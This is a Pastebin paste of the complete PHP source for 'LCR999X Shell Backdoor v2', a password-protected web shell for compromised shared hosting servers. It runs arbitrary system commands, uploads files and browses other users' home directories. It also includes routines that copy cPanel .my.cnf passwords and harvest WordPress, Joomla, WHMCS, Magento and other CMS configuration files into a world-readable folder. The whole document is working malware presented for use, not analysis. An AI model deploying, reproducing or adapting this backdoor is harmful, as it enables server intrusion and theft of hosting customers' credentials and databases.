lcr999x

MiniShell v2

Jan 23rd, 2021 (edited)
724
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. error_reporting(0);
  3. ?>
  4. <!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN"
  5. "http://www.wapforum.org/DTD/xhtml-mobile10.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
  6. <title><> LCR999X - Shell Backdoor v2 <></title>
  7. <link href="http://fonts.googleapis.com/css?family=Indie+Flower" rel="stylesheet" type="text/css">
  8. <style>
  9. body {background:#fafafa;color:#8b0000;padding-left:5px;padding-right:5px;font-family:Indie Flower;font-weight:bold;}
  10. a {text-decoration:none;color:#2F706C;}
  11. .aa {border:1px solid #2B4158;margin:3px;padding-left:3px;padding-right:3px;padding:4px}
  12. textarea {background:#000000;font-family:Indie Flower;border:1px solid #2D1F3B;margin:3px;padding:2px;height:200px;width:300px;color:#036564}
  13. input[type=submit] {background:none;font-family:Indie Flower;color:#AE8FBA;border:1px solid #2B4158;margin:3px;padding-left:3px;padding-right:3px;padding:4px}
  14. .t {color:#AE8FBA}
  15. input[type=file], input[type=text], input[type=password] {background:#fafafa;font-family:Indie Flower;color:#036564;border:1px solid #2D1F3B;margin:3px;padding:2px;height:21px;width:300px;}
  16. </style>
  17.  
  18. <?php
  19. $pass="8ef6c91b0c669894af01d616ddf16519";
  20. session_start();
  21. error_reporting(0);
  22. function demon(){
  23. echo '<center>&#8226; <> LCR999X ~ Shell Backdoor v2 <> &#8226;<br><form action="" method="post">
  24. <input type="password" style="width:250px" name="pass" value="" />  <input type="submit" value=" >> " name="submitlogin" />    
  25. </form></center>';
  26. exit;
  27. }
  28.  
  29. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  30. if(empty($pass)||(isset($_POST['pass'])&&(md5($_POST['pass'])==$pass)))$_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  31. else
  32. demon();
  33.  if(isset($_GET['log'])&&($_GET['log']=='out')){ unset($_SESSION[md5($_SERVER['HTTP_HOST'])]); }
  34.  
  35. if($_GET['path']){
  36.     $path = $_GET['path'];
  37. } else {
  38.     $path = getcwd();
  39. }
  40. error_reporting(0);
  41. $dir = str_replace('\\','/',$path);
  42. $paths = explode('/',$dir);
  43. $uname = php_uname();
  44. $os = PHP_OS;
  45. $ip = $_SERVER['SERVER_ADDR'];
  46. $id = getmyuid().'/'.getmygid();
  47. $soft = $_SERVER['SERVER_SOFTWARE'];
  48. $ver = phpversion();
  49. if(ini_get('safe_mode')==0){ $sm = "<font color='#EA5A6A'>OFF</font>"; } else { $sm = "ON"; }
  50. if(get_magic_quotes_gpc()=="1" or get_magic_quotes_gpc()=="on"){ $mq = "<font color='#EA5A6A'>OFF</font>"; } else { $mq = "ON"; }
  51.  
  52. function exe($cmd){
  53.     if(function_exists('system')) {
  54.         @ob_start();
  55.         @system($cmd);
  56.         $buff = @ob_get_contents();
  57.         @ob_end_clean();
  58.         return $buff;
  59.     }
  60.     elseif(function_exists('exec')) {
  61.         @exec($cmd,$results);
  62.         $buff = "";
  63.         foreach($results as $result){
  64.             $buff .= $result;
  65.         }
  66.         return $buff;
  67.     }
  68.     elseif(function_exists('passthru')) {
  69.         @ob_start();
  70.         @passthru($cmd);
  71.         $buff = @ob_get_contents();
  72.         @ob_end_clean();
  73.         return $buff;
  74.     }
  75.     elseif(function_exists('shell_exec')){
  76.         $buff = @shell_exec($cmd);
  77.         return $buff;
  78.     }
  79. }
  80.  
  81. if(function_exists('mysql_connect')){ $mysql = "ON"; } else { $mysql = "<font color='#EA5A6A'>OFF</font>"; }
  82. if(function_exists('curl_version')) { $curl = "ON"; } else { $curl = "<font color='#EA5A6A'>OFF</font>"; }
  83. if(exe('wget --help')) { $wget = "ON"; } else {  $wget = "<font color='#EA5A6A'>OFF</font>"; }
  84. if(exe('perl -h')) { $perl = "ON"; } else {  $perl = "<font color='#EA5A6A'>OFF</font>"; }
  85. if($disablefunc=@ini_get("disable_functions")){ $df = "ON"; }else { $df = "<font color='#EA5A6A'>OFF</font>"; }
  86.  
  87. echo "<center><h2><> LCR999X ~ Shell Backdoor v2 <></h2></center><br>&#8855;&#8805; <font color='#629454'>UNAME :</font> $uname <br>";
  88. echo "&#8855;&#8805 <font color='#629454'>IP :</font> $ip $soft $os $ver ( $id )<br>";
  89. echo "&#8855;&#8805 <font color='#629454'>SAFEMODE :</font> $sm  <br>&#8855;&#8805 <font color='#629454'><font color='#629454'>MAGIC :</font> $mq &#8227; <font color='#629454'>MYSQL :</font> $mysql  &#8227; <font color='#629454'>DISFUNC :</font> $df &#8227; <font color='#629454'>CURL :</font> $curl &#8227; <font color='#629454'>WGET :</font> $wget<br>";
  90.  
  91. echo "&#8747;&#8747; <font color='#500000'>PATH :</font> ";
  92. foreach($paths as $id=>$pat){
  93. if($pat == '' && $id == 0){
  94. $a = true;
  95. echo '<a style="color:#F7C630;" href="?path=/"> &#8227; </a>';
  96. continue;
  97. }
  98. if($pat == '') continue;
  99. echo '<a class="t" href="?path=';
  100. for($i=0;$i<=$id;$i++){
  101. echo "$paths[$i]";
  102. if($i != $id) echo "/";
  103. }
  104. echo '">'.$pat.'</a> &#8227; ';
  105. }
  106. echo "<br><br><center><a class='aa' href='?upload&path=$path'>Unggah</a> <a class='aa'  href='?jumping&path=$path'>Teleport</a> <a class='aa'  href='?config'>Konfig</a> <a class='aa'  href='?cpcrack'>cPanel</a></center><br>";
  107.  
  108. if(isset($_GET['cpcrack'])){
  109.    
  110.     function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
  111.     $ar0=explode($marqueurDebutLien, $text);
  112.     $ar1=explode($marqueurFinLien, $ar0[$i]);
  113.     return trim($ar1[0]);
  114. }
  115.  
  116. echo '<br><br>';
  117.  
  118. echo "<center>";
  119. $d0mains = @file('/etc/named.conf');
  120. $domains = scandir("/var/named");
  121.  
  122. if ($domains or $d0mains)
  123. {
  124.     $domains = scandir("/var/named");
  125.     if($domains) {
  126. echo '<table border="0" cellpadding="3" cellspacing="1" align="center" ><tr><th style="border:1px solid #2B4158;margin:3px;padding-left:3px;padding-right:3px;padding:4px"> Domain </th><th style="border:1px solid #2B4158;margin:3px;padding-left:3px;padding-right:3px;padding:4px"> User </th><th style="border:1px solid #2B4158;margin:3px;padding-left:3px;padding-right:3px;padding:4px"> Pass </th><th style="border:1px solid #2B4158;margin:3px;padding-left:3px;padding-right:3px;padding:4px"> >> </th></tr>';
  127. $count=1;
  128. $dc = 0;
  129. $list = scandir("/var/named");
  130. foreach($list as $domain){
  131. if(strpos($domain,".db")){
  132. $domain = str_replace('.db','',$domain);
  133. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  134. $dirz = '/home/'.$owner['name'].'/.my.cnf';
  135. $path = getcwd();
  136.  
  137. if (is_readable($dirz)) {
  138. copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
  139. $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
  140. $password=entre2v2($p,'password="','"');
  141. echo "<tr><td style='border-left:1px solid white;'><a href='http://".$domain.":2082' target='_blank'>".$domain."</a></td><td style='border-left:1px solid white;'>".$owner['name']."</td><td style=border-left:1px solid white;>".$password."</td><td style='border-left:1px solid white;'><a href='".$owner['name'].".txt' target='_blank'> >> </a></td></tr>";
  142. $dc++;
  143. }
  144. }
  145. }
  146. echo '</table>';
  147. $total = $dc;
  148. echo '<font color="#629454">Total cPanel Found :</font> '.$total.'<br />';
  149. echo '</center>';
  150. }else{
  151. $d0mains = @file('/etc/named.conf');
  152.     if($d0mains) {
  153. echo '<table border="0" cellpadding="3" cellspacing="1" align="center" ><tr><th style="border:1px solid #2B4158;margin:3px;padding-left:3px;padding-right:3px;padding:4px"> Domain </th><th style="border:1px solid #2B4158;margin:3px;padding-left:3px;padding-right:3px;padding:4px"> User </th><th style="border:1px solid #2B4158;margin:3px;padding-left:3px;padding-right:3px;padding:4px"> Pass </th><th style="border:1px solid #2B4158;margin:3px;padding-left:3px;padding-right:3px;padding:4px"> >> </th></tr>';
  154. $count=1;
  155. $dc = 0;
  156. $mck = array();
  157. foreach($d0mains as $d0main){
  158.     if(@eregi('zone',$d0main)){
  159.         preg_match_all('#zone "(.*)"#',$d0main,$domain);
  160.         flush();
  161.         if(strlen(trim($domain[1][0])) >2){
  162.             $mck[] = $domain[1][0];
  163.         }
  164.     }
  165. }
  166. $mck = array_unique($mck);
  167. $usr = array();
  168. $dmn = array();
  169. foreach($mck as $o) {
  170.     $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
  171.     $usr[] = $infos['name'];
  172.     $dmn[] = $o;
  173. }
  174. array_multisort($usr,$dmn);
  175. $dt = file('/etc/passwd');
  176. $passwd = array();
  177. foreach($dt as $d) {
  178.     $r = explode(':',$d);
  179.     if(strpos($r[5],'home')) {
  180.         $passwd[$r[0]] = $r[5];
  181.     }
  182. }
  183. $l=0;
  184. $j=1;
  185. foreach($usr as $r) {
  186. $dirz = '/home/'.$r.'/.my.cnf';
  187. $path = getcwd();
  188. if (is_readable($dirz)) {
  189. copy($dirz, ''.$path.'/'.$r.'.txt');
  190. $p=file_get_contents(''.$path.'/'.$r.'.txt');
  191. $password=entre2v2($p,'password="','"');
  192. echo "<tr><td style='border-left:1px solid white;'><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td style=border-left:1px solid white;>'.$r."</td><td style=border-left:1px solid white;>".$password."</td><td style=border-left:1px solid white;><a href='".$r.".txt' target='_blank'> >> </a></td></tr>";
  193. $dc++;
  194.                 flush();
  195.                 $l=$l?0:1;
  196.                 $j++;
  197.                                 }
  198.             }
  199.                         }
  200. echo '</table>';
  201. $total = $dc;
  202. echo '<font color="#629454">Total cPanel Found :</font> '.$total.'<br />';
  203. echo '</center>';
  204.  
  205. }
  206. }else{
  207. echo "</center><font color='#629454'>ERROR : </font>/var/named or etc/named.conf Not Accessible!";
  208. }
  209.     exit;
  210.    
  211.     }
  212.  
  213. if(isset($_GET['view'])){
  214.     echo "<center><textarea>".htmlentities(file_get_contents($_GET['path'].'/'.$_GET['filename']))."</textarea></center>";
  215.     exit;
  216. }
  217. if(isset($_GET['jumping'])){
  218.      ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<br><font color="#AE8FBA">Error: safe_mode = on</font>');
  219.     set_time_limit(0);
  220.     @$passwd = fopen('/etc/passwd','r');
  221.     if (!$passwd) { die('<br><font color="#AE8FBA">Error : coudn`t read /etc/passwd</font>'); }
  222.     $pub = array();
  223.     $users = array();
  224.     $conf = array();
  225.     $i = 0;
  226.     while(!feof($passwd))
  227.     {
  228.     $str = fgets($passwd);
  229.     if($i>35){
  230. $pos = strpos($str,':');
  231. $username = substr($str,0,$pos);
  232. $dirz = '/home/'.$username.'/public_html/';
  233. if(($username != '')){
  234. if(is_readable($dirz)){
  235. array_push($users,$username);
  236. array_push($pub,$dirz);
  237. }}}
  238. $i++;
  239. }
  240. echo "<br>&#8227; <font color='#629454'>Total :</font> ".sizeof($users)."/".sizeof($pub)." User";
  241. echo "<br><br>";
  242. foreach($users as $user){
  243. $path = "/home/$user/public_html/";
  244. echo " <table style='text-align:left'><tr><td style='text-align:left'> ";
  245. echo "&#8226; <a href='?path=$path'>$path</a><br>";
  246. echo " </td></tr></table> ";
  247. }
  248. exit;
  249. }
  250. // config by Indoxploit
  251. if(isset($_GET['config']))
  252. {
  253. $etc = fopen("/etc/passwd", "r");
  254. $idx = mkdir("lcr999x", 0777);
  255. $isi_htc = "Options all\nRequire None\nSatisfy Any";
  256. $htc = fopen("lcr999x/.htaccess","w");
  257. fwrite($htc, $isi_htc);
  258. while($passwd = fgets($etc)) {
  259. if($passwd == "" || !$etc) {
  260. echo "<font color=#AE8FBA>Can't read /etc/passwd</font>";
  261. } else {
  262. preg_match_all('/(.*?):x:/', $passwd, $user_config);
  263. foreach($user_config[1] as $user_idx){
  264. $user_config_dir = "/home/$user_idx/public_html/";
  265. if(is_readable($user_config_dir)) {
  266. $grab_config = array(
  267. "/home/$user_idx/.my.cnf" => "cpanel",
  268. "/home/$user_idx/.accesshash" => "WHM-accesshash",
  269. "/home/$user_idx/public_html/bw-configs/config.ini" => "BosWeb",
  270. "/home/$user_idx/public_html/config/koneksi.php" => "Lokomedia",
  271. "/home/$user_idx/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  272. "/home/$user_idx/public_html/clientarea/configuration.php" => "WHMCS",
  273. "/home/$user_idx/public_html/whm/configuration.php" => "WHMCS",
  274. "/home/$user_idx/public_html/whmcs/configuration.php" => "WHMCS",
  275. "/home/$user_idx/public_html/forum/config.php" => "phpBB",
  276. "/home/$user_idx/public_html/sites/default/settings.php" => "Drupal",
  277. "/home/$user_idx/public_html/config/settings.inc.php" => "PrestaShop",
  278. "/home/$user_idx/public_html/app/etc/local.xml" => "Magento",
  279. "/home/$user_idx/public_html/joomla/configuration.php" => "Joomla",
  280. "/home/$user_idx/public_html/configuration.php" => "Joomla",
  281. "/home/$user_idx/public_html/wp/wp-config.php" => "WordPress",
  282. "/home/$user_idx/public_html/wordpress/wp-config.php" => "WordPress",
  283. "/home/$user_idx/public_html/wp-config.php" => "WordPress",
  284. "/home/$user_idx/public_html/admin/config.php" => "OpenCart",
  285. "/home/$user_idx/public_html/slconfig.php" => "Sitelok",
  286. "/home/$user_idx/public_html/application/config/database.php" => "Ellislab");
  287. foreach($grab_config as $config => $nama_config){
  288. $ambil_config = file_get_contents($config);
  289. if($ambil_config == ''){
  290. } else {
  291. $file_config = fopen("lcr999x/$user_idx-$nama_config.txt","w");
  292. fputs($file_config,$ambil_config);
  293. }}} }}}
  294. $path = getcwd();
  295. echo "&#8227;<font color='629454'> Done :</font> <a href='?beby=exploler&path=$path$dir/lcr999x'>Click Here</a>";
  296. exit;
  297. }
  298. // uploader
  299. if(isset($_GET['upload'])){
  300.     $path = $_GET['path'];
  301. echo '<center><form action="" method="post" enctype="multipart/form-data">
  302. <input type="file" name="file" /><br>
  303. <input type="text" name="ufile" placeholder="jkt48.php" /><br>
  304. <input name="upload" type="submit" value="Upload" /> <input type="submit" value="Reset" /> </form></center>';
  305.  
  306. if(isset($_REQUEST['ufile'])){
  307. $ufile = $_POST['ufile'];
  308. }
  309. if(isset($_REQUEST['upload'])){
  310. if($_POST['upload']){
  311. if(@copy($_FILES['file']['tmp_name'],$path.'/'.$ufile)){
  312.     $size  = filesize($ufile);
  313.     echo '<script>alert("#Dhetry.py\n\t [+] Name : '.$ufile.'\n\t [+] Size : '.$size.' Bytes\n\t [+] Status : Suksess !!\n\t [+] Path : '.$path.'/'.$ufile.'")</script>';
  314.     echo "&#8227;<font color='#629454'> Sucess :</font> <a href='#'>$ufile</a>";
  315. } else {
  316. $size  = filesize($ufile);
  317.     echo '<script>alert("#Dhetry.py\n\t [+] Name : '.$ufile.'\n\t [+] Size : '.$size.' Bytes\n\t [+] Status : Gagall !!!\n\t [+] Path : '.$path.'/'.$ufile.' ")</script>';
  318.     echo "&#8227;<font color='629454'> Gagal :</font> <a href='#'>$ufile</a>";
  319. }}}
  320.  
  321. exit;
  322. }
  323.  
  324.  
  325.  
  326. // scandir
  327. $files = scandir ($path);
  328. $direct = 0;
  329. foreach ($files as $out) {
  330. if(!is_dir("$path/$out") || $out == '.' || $out == '..') continue;
  331. echo '&#8226; <a href="?path='.$path.'/'.$out.'">'.$out.'</a><br>';
  332. }
  333. if(is_dir($path)){
  334. foreach ($files as $out) {
  335. if(!is_file("$path/$out") || $out == '.' || $out == '..') continue;
  336. echo '&#8226; <a href="?view&path='.$path.'&get='.$path.'/'.$out.'&filename='.$out.'">'.$out.'</a><br>';
  337. }
  338. }
  339. ?>
  340. <br>
  341. &copy; Copyright 2018 LCR999X
  342. </html>
RAW Paste Data